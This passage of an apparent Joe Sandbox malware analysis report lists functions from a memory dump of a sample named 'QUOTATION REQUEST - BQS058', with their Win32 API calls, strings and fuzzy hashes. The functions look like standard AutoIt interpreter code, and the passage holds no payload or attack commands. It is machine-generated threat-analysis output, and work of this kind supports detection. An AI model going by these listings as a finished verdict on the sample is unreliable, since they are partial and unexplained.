0, xrefs: 01058E55

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 56d95917d14cc8688813425ce501128b15d12f40e3e4e621ec49b07e4b74aff2
Instruction ID: 43432b34ae85f7c3b8917398ea212b2a1ede3509c6795e7b4ac1c8195cedd7f5
Opcode Fuzzy Hash: 56d95917d14cc8688813425ce501128b15d12f40e3e4e621ec49b07e4b74aff2
Instruction Fuzzy Hash: 73E17470900209EBEF619F65CC88EEF7BB9EF09710F008196FE95AA191D7759680DF60

Function 0105488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 010549CA
GetDesktopWindow.USER32 ref: 010549DF
GetWindowRect.USER32(00000000), ref: 010549E6
GetWindowLongW.USER32(?,000000F0), ref: 01054A48
DestroyWindow.USER32(?), ref: 01054A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 01054A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01054ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 01054AE1
SendMessageW.USER32(?,00000421,?,?), ref: 01054AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 01054B09
IsWindowVisible.USER32(?), ref: 01054B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 01054B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 01054B58
GetWindowRect.USER32(?,?), ref: 01054B70
MonitorFromPoint.USER32(?,?,00000002), ref: 01054B96
GetMonitorInfoW.USER32(00000000,?), ref: 01054BB0
CopyRect.USER32(?,?), ref: 01054BC7
SendMessageW.USER32(?,00000412,00000000), ref: 01054C32

Strings

0, xrefs: 01054975
tooltips_class32, xrefs: 01054A96
(, xrefs: 01054BA3

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 8c84c527c586dff63dd06f745a9eb20075d9a009b208c482793054f4f36f2070
Instruction ID: aae82d38549bc4f2c0a761e3986b5671d5b055420f0b0b6b9df3f8d3b4a031c5
Opcode Fuzzy Hash: 8c84c527c586dff63dd06f745a9eb20075d9a009b208c482793054f4f36f2070
Instruction Fuzzy Hash: 54B1AA70608341AFDB84DF68C848BABBBE5BF88314F04891DF9D99B291E775E844CB51

Function 0103449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 010344AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 010344D2
_wcscpy.LIBCMT ref: 01034500
_wcscmp.LIBCMT ref: 0103450B
_wcscat.LIBCMT ref: 01034521
_wcsstr.LIBCMT ref: 0103452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 01034548
_wcscat.LIBCMT ref: 01034591
_wcscat.LIBCMT ref: 01034598
_wcsncpy.LIBCMT ref: 010345C3

Strings

04090000, xrefs: 0103457E
\VarFileInfo\Translation, xrefs: 01034540
StringFileInfo\, xrefs: 0103451B
%u.%u.%u.%u, xrefs: 01034626
DefaultLangCodepage, xrefs: 010345AB

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 4cb37ec930ddc1e78f896c66b0ae0736e1e9c4cab045f398d264fe1fefa4ce2a
Instruction ID: 6e2b8c1cadc807a2879f115b99cd5b92e457ed909c81f0d82aeb5e8ece1b164e
Opcode Fuzzy Hash: 4cb37ec930ddc1e78f896c66b0ae0736e1e9c4cab045f398d264fe1fefa4ce2a
Instruction Fuzzy Hash: 35414B719002097BDB11BA75CC03EBF37ACEF85310F04005AFA40EA193EF7C9A01A6A9

Function 00FD27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FD28BC
GetSystemMetrics.USER32(00000007), ref: 00FD28C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FD28EF
GetSystemMetrics.USER32(00000008), ref: 00FD28F7
GetSystemMetrics.USER32(00000004), ref: 00FD291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00FD2939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00FD2949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00FD297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00FD2990
GetClientRect.USER32(00000000,000000FF), ref: 00FD29AE
GetStockObject.GDI32(00000011), ref: 00FD29CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 00FD29D5

Part of subcall function 00FD2344: GetCursorPos.USER32(?), ref: 00FD2357
Part of subcall function 00FD2344: ScreenToClient.USER32(010957B0,?), ref: 00FD2374
Part of subcall function 00FD2344: GetAsyncKeyState.USER32(00000001), ref: 00FD2399
Part of subcall function 00FD2344: GetAsyncKeyState.USER32(00000002), ref: 00FD23A7

SetTimer.USER32(00000000,00000000,00000028,00FD1256), ref: 00FD29FC

Strings

AutoIt v3 GUI, xrefs: 00FD2974

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: e8d7637cd2951665511aea71869ff1fb9de0c9e02ff4cec9753351c9b49f12ee
Instruction ID: 193cec7b25bf11a12b3ba343cc1b25a1c32be235eecea2d3010a39fa0fceab31
Opcode Fuzzy Hash: e8d7637cd2951665511aea71869ff1fb9de0c9e02ff4cec9753351c9b49f12ee
Instruction Fuzzy Hash: 9CB1B171A0020ADFEB25DFA8DC55BAE7BB5FB08310F14421AFA55E72D4CB799801DB90

Function 0102A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0102A47A
__swprintf.LIBCMT ref: 0102A51B
_wcscmp.LIBCMT ref: 0102A52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0102A583
_wcscmp.LIBCMT ref: 0102A5BF
GetClassNameW.USER32(?,?,00000400), ref: 0102A5F6
GetDlgCtrlID.USER32(?), ref: 0102A648
GetWindowRect.USER32(?,?), ref: 0102A67E
GetParent.USER32(?), ref: 0102A69C
ScreenToClient.USER32(00000000), ref: 0102A6A3
GetClassNameW.USER32(?,?,00000100), ref: 0102A71D
_wcscmp.LIBCMT ref: 0102A731
GetWindowTextW.USER32(?,?,00000400), ref: 0102A757
_wcscmp.LIBCMT ref: 0102A76B

Part of subcall function 00FF362C: _iswctype.LIBCMT ref: 00FF3634

Strings

%s%u, xrefs: 0102A515

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 590bd230984d375d3daabf8ee60fe0ca5b4fd3240549c92732dabd43b8ad9ceb
Instruction ID: cd90b1e8724918efe90a72708a643f9d6e93edbda2de67271a02ec17cec03e75
Opcode Fuzzy Hash: 590bd230984d375d3daabf8ee60fe0ca5b4fd3240549c92732dabd43b8ad9ceb
Instruction Fuzzy Hash: F4A1C071304726EBDB15DE68C888BAABBE8FF88314F008519EADAC3551DF34E545CB91

Function 0102AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0102AF18
_wcscmp.LIBCMT ref: 0102AF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 0102AF51
CharUpperBuffW.USER32(?,00000000), ref: 0102AF6E
_wcscmp.LIBCMT ref: 0102AF8C
_wcsstr.LIBCMT ref: 0102AF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 0102AFD5
_wcscmp.LIBCMT ref: 0102AFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 0102B00C
GetClassNameW.USER32(00000018,?,00000400), ref: 0102B055
_wcscmp.LIBCMT ref: 0102B065
GetClassNameW.USER32(00000010,?,00000400), ref: 0102B08D
GetWindowRect.USER32(00000004,?), ref: 0102B0F6

Strings

@, xrefs: 0102AEF9
ThumbnailClass, xrefs: 0102AFE0, 0102B060

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 029f48c372327c5e22292681c5ec0d02d60388c3ece5bed2f149569b5f5c33ff
Instruction ID: 517b9529a8a12f1c95df9705dda4f4fa1a0d156fb3970d57235cedf60ed83962
Opcode Fuzzy Hash: 029f48c372327c5e22292681c5ec0d02d60388c3ece5bed2f149569b5f5c33ff
Instruction Fuzzy Hash: 9C81E47110431A9FDB51DF18C884FAABBD8FF84314F1884AAFEC58A096DB38D945CB61

Function 0102ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0102AC33

Strings

LAST, xrefs: 0102ABF8
[ACTIVE, xrefs: 0102AC20
[LAST, xrefs: 0102ACE0
[HANDLE:, xrefs: 0102AC3F
[REGEXPTITLE:, xrefs: 0102AC5B
CLASSNAME=, xrefs: 0102AC70
REGEXP=, xrefs: 0102AC48
[CLASS:, xrefs: 0102AC83
ACTIVE, xrefs: 0102AC0E
HANDLE=, xrefs: 0102AC2C
[ALL, xrefs: 0102ACD9
ALL, xrefs: 0102ACC7

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 822603a9edeebd68f89b88e448817606a20e162eb778e7aa4f9916b4c6c6cc78
Instruction ID: ee8c30b3d723fed9eed73c73856c7f3ef462bf103ae581aa99bc251d81cb985c
Opcode Fuzzy Hash: 822603a9edeebd68f89b88e448817606a20e162eb778e7aa4f9916b4c6c6cc78
Instruction Fuzzy Hash: F131F231648219E6DB00FAA4DE43EBEB7A59F50750F30002AF8C27B5A5FE256B049651

Function 01044FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 01045013
LoadCursorW.USER32(00000000,00007F00), ref: 0104501E
LoadCursorW.USER32(00000000,00007F03), ref: 01045029
LoadCursorW.USER32(00000000,00007F8B), ref: 01045034
LoadCursorW.USER32(00000000,00007F01), ref: 0104503F
LoadCursorW.USER32(00000000,00007F81), ref: 0104504A
LoadCursorW.USER32(00000000,00007F88), ref: 01045055
LoadCursorW.USER32(00000000,00007F80), ref: 01045060
LoadCursorW.USER32(00000000,00007F86), ref: 0104506B
LoadCursorW.USER32(00000000,00007F83), ref: 01045076
LoadCursorW.USER32(00000000,00007F85), ref: 01045081
LoadCursorW.USER32(00000000,00007F82), ref: 0104508C
LoadCursorW.USER32(00000000,00007F84), ref: 01045097
LoadCursorW.USER32(00000000,00007F04), ref: 010450A2
LoadCursorW.USER32(00000000,00007F02), ref: 010450AD
LoadCursorW.USER32(00000000,00007F89), ref: 010450B8
GetCursorInfo.USER32(?), ref: 010450C8

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: c5d003450d74b4810474b77f568486f51d5f22a02e5da4bd6d92bfb050f108aa
Instruction ID: 7a70447a4c6d8c855cd1782e7fd7f09603f7e8f8c763f03bb288d29b74298332
Opcode Fuzzy Hash: c5d003450d74b4810474b77f568486f51d5f22a02e5da4bd6d92bfb050f108aa
Instruction Fuzzy Hash: C931F4B1D4831A6BDF609FB68C8995FBFE8FF04750F50453AA54DE7280DA7865008F91

Function 0105A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0105A259
DestroyWindow.USER32(?,?), ref: 0105A2D3

Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0105A34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0105A36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0105A382
DestroyWindow.USER32(00000000), ref: 0105A3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00FD0000,00000000), ref: 0105A3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0105A3F4
GetDesktopWindow.USER32 ref: 0105A40D
GetWindowRect.USER32(00000000), ref: 0105A414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0105A42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0105A444

Part of subcall function 00FD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FD25EC

Strings

0, xrefs: 0105A26F
tooltips_class32, xrefs: 0105A346, 0105A3D4

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 717ad4bba265574d223142f8f09c60bac83083441333d08bf008fa8bd0a3d799
Instruction ID: 4eb0b9b016f6ee46d4fccadc54391a1858643bdeea53345a33078a0dce05c0c2
Opcode Fuzzy Hash: 717ad4bba265574d223142f8f09c60bac83083441333d08bf008fa8bd0a3d799
Instruction Fuzzy Hash: DC717E70240205AFEB61DF28CC49F6B7BE5FB88304F04465DF9C59B2A1DB7AA902CB51

Function 0105C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD2612: GetWindowLongW.USER32(?,000000EB), ref: 00FD2623

DragQueryPoint.SHELL32(?,?), ref: 0105C627

Part of subcall function 0105AB37: ClientToScreen.USER32(?,?), ref: 0105AB60
Part of subcall function 0105AB37: GetWindowRect.USER32(?,?), ref: 0105ABD6
Part of subcall function 0105AB37: PtInRect.USER32(?,?,0105C014), ref: 0105ABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 0105C690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0105C69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0105C6BE
_wcscat.LIBCMT ref: 0105C6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0105C705
SendMessageW.USER32(?,000000B0,?,?), ref: 0105C71E
SendMessageW.USER32(?,000000B1,?,?), ref: 0105C735
SendMessageW.USER32(?,000000B1,?,?), ref: 0105C757
DragFinish.SHELL32(?), ref: 0105C75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0105C851

Strings

@GUI_DRAGID, xrefs: 0105C7C9
@GUI_DROPID, xrefs: 0105C77E
@GUI_DRAGFILE, xrefs: 0105C800

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 82d6debb0aec65c6f91c0bd8de5a94d0a331985ef68498b62161acb57fe21776
Instruction ID: 5241e5f0e3b0087592d7bd8215036484fc910bd50fbadd47e88bd89781388bdb
Opcode Fuzzy Hash: 82d6debb0aec65c6f91c0bd8de5a94d0a331985ef68498b62161acb57fe21776
Instruction Fuzzy Hash: A0615771108301AFDB11EF64CC85DAFBBE9EF88750F00091EF5D1962A1DB75AA09DB62

Function 01037D1A Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 01037D5F
VariantCopy.OLEAUT32(00000000,?), ref: 01037D68
VariantClear.OLEAUT32(00000000), ref: 01037D74
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 01037E62
__swprintf.LIBCMT ref: 01037E92
VarR8FromDec.OLEAUT32(?,?), ref: 01037EBE
VariantInit.OLEAUT32(?), ref: 01037F6F
SysFreeString.OLEAUT32(00000016), ref: 01038003
VariantClear.OLEAUT32(?), ref: 0103805D
VariantClear.OLEAUT32(?), ref: 0103806C
VariantInit.OLEAUT32(00000000), ref: 010380AA

Strings

Default, xrefs: 01037F1F
%4d%02d%02d%02d%02d%02d, xrefs: 01037E8C

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: 719bf7d8e49ea0bbaeb27ef8967a91b3ad54a4f28c71f2c9ded5ccd28f530839
Instruction ID: 926bb2e984307a80336146abc854480af2db0f0f0ac886eb5a37f8cd567a39aa
Opcode Fuzzy Hash: 719bf7d8e49ea0bbaeb27ef8967a91b3ad54a4f28c71f2c9ded5ccd28f530839
Instruction Fuzzy Hash: 43D117B1600606EBDF10AF65D848B7EBBF9BF85300F048596F5859B284DF79E840CBA1

Function 01054392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 01054424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0105446F

Strings

GETTEXT, xrefs: 010545C2
ISCHECKED, xrefs: 010545F2
GETITEMCOUNT, xrefs: 01054551
EXPAND, xrefs: 01054521
COLLAPSE, xrefs: 010544B5
UNCHECK, xrefs: 0105464B
GETSELECTED, xrefs: 0105457F
CHECK, xrefs: 0105448F
SELECT, xrefs: 01054620
EXISTS, xrefs: 010544D8
GETTOTALCOUNT, xrefs: 01054456

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 9ea3a7c451ddfbf3640690da4c905848e0706026533197ca63b726c51da1cc57
Instruction ID: c19c872abc9495cc1f416a348229cc3a352284f046f6951e319bf30996487a9f
Opcode Fuzzy Hash: 9ea3a7c451ddfbf3640690da4c905848e0706026533197ca63b726c51da1cc57
Instruction Fuzzy Hash: DC919D302047118BCB04FF14C851AAEB7E2AF94754F48485DECD69B3A2DB79EC49DB91

Function 0105B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0105B8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,010591C2), ref: 0105B910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0105B949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0105B98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0105B9C3
FreeLibrary.KERNEL32(?), ref: 0105B9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0105B9DF
DestroyIcon.USER32(?,?,?,?,?,010591C2), ref: 0105B9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0105BA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0105BA17

Part of subcall function 00FF2EFD: __wcsicmp_l.LIBCMT ref: 00FF2F86

Strings

.dll, xrefs: 0105B86D
.icl, xrefs: 0105B82A
.exe, xrefs: 0105B84A

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
